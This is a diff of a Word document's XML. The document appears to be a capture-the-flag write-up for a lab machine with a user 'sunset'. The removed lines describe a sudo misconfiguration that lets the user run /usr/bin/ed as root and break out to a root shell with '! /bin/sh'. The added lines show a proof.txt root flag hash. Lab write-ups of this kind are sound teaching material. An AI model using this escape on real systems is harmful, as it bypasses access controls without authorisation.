-                  <pic:nvPicPr>
-                    <pic:cNvPr id="311733621" name=""/>
-                    <pic:cNvPicPr/>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId18"/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr>
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="5038095" cy="2142857"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:outlineLvl w:val="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
-          <w:kern w:val="36"/>
-          <w:sz w:val="48"/>
-          <w:szCs w:val="48"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:outlineLvl w:val="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
-          <w:kern w:val="36"/>
-          <w:sz w:val="48"/>
-          <w:szCs w:val="48"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:outlineLvl w:val="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
-          <w:kern w:val="36"/>
-          <w:sz w:val="48"/>
-          <w:szCs w:val="48"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:outlineLvl w:val="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
-          <w:kern w:val="36"/>
-          <w:sz w:val="48"/>
-          <w:szCs w:val="48"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:outlineLvl w:val="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
-          <w:kern w:val="36"/>
-          <w:sz w:val="48"/>
-          <w:szCs w:val="48"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
-          <w:kern w:val="36"/>
-          <w:sz w:val="48"/>
-          <w:szCs w:val="48"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>Privilege Escalation</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>To identify possible privilege escalation vectors, the following command was executed:</w:t>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>Found file:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8480,7 +8261,7 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>sudo -l</w:t>
+        <w:t>proof.txt</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8500,27 +8281,7 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t xml:space="preserve">The output revealed that the user </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>sunset</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> could run the following command as root:</w:t>
+        <w:t>Command:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8566,35 +8327,7 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>usr</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>/bin/ed</w:t>
+        <w:t>cat proof.txt</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8614,162 +8347,7 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>without requiring a password.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="104F3AAE" wp14:editId="35BC3C4F">
-            <wp:extent cx="5731510" cy="652780"/>
-            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
-            <wp:docPr id="475220026" name="Picture 1"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="475220026" name=""/>
-                    <pic:cNvPicPr/>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId19"/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr>
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="5731510" cy="652780"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:outlineLvl w:val="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
-          <w:kern w:val="36"/>
-          <w:sz w:val="48"/>
-          <w:szCs w:val="48"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
-          <w:kern w:val="36"/>
-          <w:sz w:val="48"/>
-          <w:szCs w:val="48"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Exploiting Sudo Misconfiguration</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">The </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>ed</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> editor was executed with sudo privileges.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Command:</w:t>
+        <w:t>Root flag:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8815,35 +8393,7 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>sudo /</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>usr</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>/bin/ed</w:t>
+        <w:t>ab28c8ca8da1b9ffc2d702ac54221105</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8858,266 +8408,14 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Inside the editor, a shell was spawned:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:tabs>
-          <w:tab w:val="left" w:pos="916"/>
-          <w:tab w:val="left" w:pos="1832"/>
-          <w:tab w:val="left" w:pos="2748"/>
-          <w:tab w:val="left" w:pos="3664"/>
-          <w:tab w:val="left" w:pos="4580"/>
-          <w:tab w:val="left" w:pos="5496"/>
-          <w:tab w:val="left" w:pos="6412"/>
-          <w:tab w:val="left" w:pos="7328"/>
-          <w:tab w:val="left" w:pos="8244"/>
-          <w:tab w:val="left" w:pos="9160"/>
-          <w:tab w:val="left" w:pos="10076"/>
-          <w:tab w:val="left" w:pos="10992"/>
-          <w:tab w:val="left" w:pos="11908"/>
-          <w:tab w:val="left" w:pos="12824"/>
-          <w:tab w:val="left" w:pos="13740"/>
-          <w:tab w:val="left" w:pos="14656"/>
-        </w:tabs>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>! /bin/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>sh</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">This provided </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>root access</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Verification:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:tabs>
-          <w:tab w:val="left" w:pos="916"/>
-          <w:tab w:val="left" w:pos="1832"/>
-          <w:tab w:val="left" w:pos="2748"/>
-          <w:tab w:val="left" w:pos="3664"/>
-          <w:tab w:val="left" w:pos="4580"/>
-          <w:tab w:val="left" w:pos="5496"/>
-          <w:tab w:val="left" w:pos="6412"/>
-          <w:tab w:val="left" w:pos="7328"/>
-          <w:tab w:val="left" w:pos="8244"/>
-          <w:tab w:val="left" w:pos="9160"/>
-          <w:tab w:val="left" w:pos="10076"/>
-          <w:tab w:val="left" w:pos="10992"/>
-          <w:tab w:val="left" w:pos="11908"/>
-          <w:tab w:val="left" w:pos="12824"/>
-          <w:tab w:val="left" w:pos="13740"/>
-          <w:tab w:val="left" w:pos="14656"/>
-        </w:tabs>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>whoami</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Output:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:tabs>
-          <w:tab w:val="left" w:pos="916"/>
-          <w:tab w:val="left" w:pos="1832"/>
-          <w:tab w:val="left" w:pos="2748"/>
-          <w:tab w:val="left" w:pos="3664"/>
-          <w:tab w:val="left" w:pos="4580"/>
-          <w:tab w:val="left" w:pos="5496"/>
-          <w:tab w:val="left" w:pos="6412"/>
-          <w:tab w:val="left" w:pos="7328"/>
-          <w:tab w:val="left" w:pos="8244"/>
-          <w:tab w:val="left" w:pos="9160"/>
-          <w:tab w:val="left" w:pos="10076"/>
-          <w:tab w:val="left" w:pos="10992"/>
-          <w:tab w:val="left" w:pos="11908"/>
-          <w:tab w:val="left" w:pos="12824"/>
-          <w:tab w:val="left" w:pos="13740"/>
-          <w:tab w:val="left" w:pos="14656"/>
-        </w:tabs>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>root</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
           <w:noProof/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2D8389BC" wp14:editId="50693864">
-            <wp:extent cx="5731510" cy="1272540"/>
-            <wp:effectExtent l="0" t="0" r="2540" b="3810"/>
-            <wp:docPr id="840029050" name="Picture 1"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="77321CAB" wp14:editId="5882CD25">
+            <wp:extent cx="5361905" cy="3257143"/>
+            <wp:effectExtent l="0" t="0" r="0" b="635"/>
+            <wp:docPr id="75862612" name="Picture 1"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -9125,11 +8423,11 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="840029050" name=""/>
+                    <pic:cNvPr id="75862612" name=""/>
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId20"/>
+                    <a:blip r:embed="rId19"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -9137,7 +8435,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5731510" cy="1272540"/>
+                      <a:ext cx="5361905" cy="3257143"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -9152,6 +8450,17 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
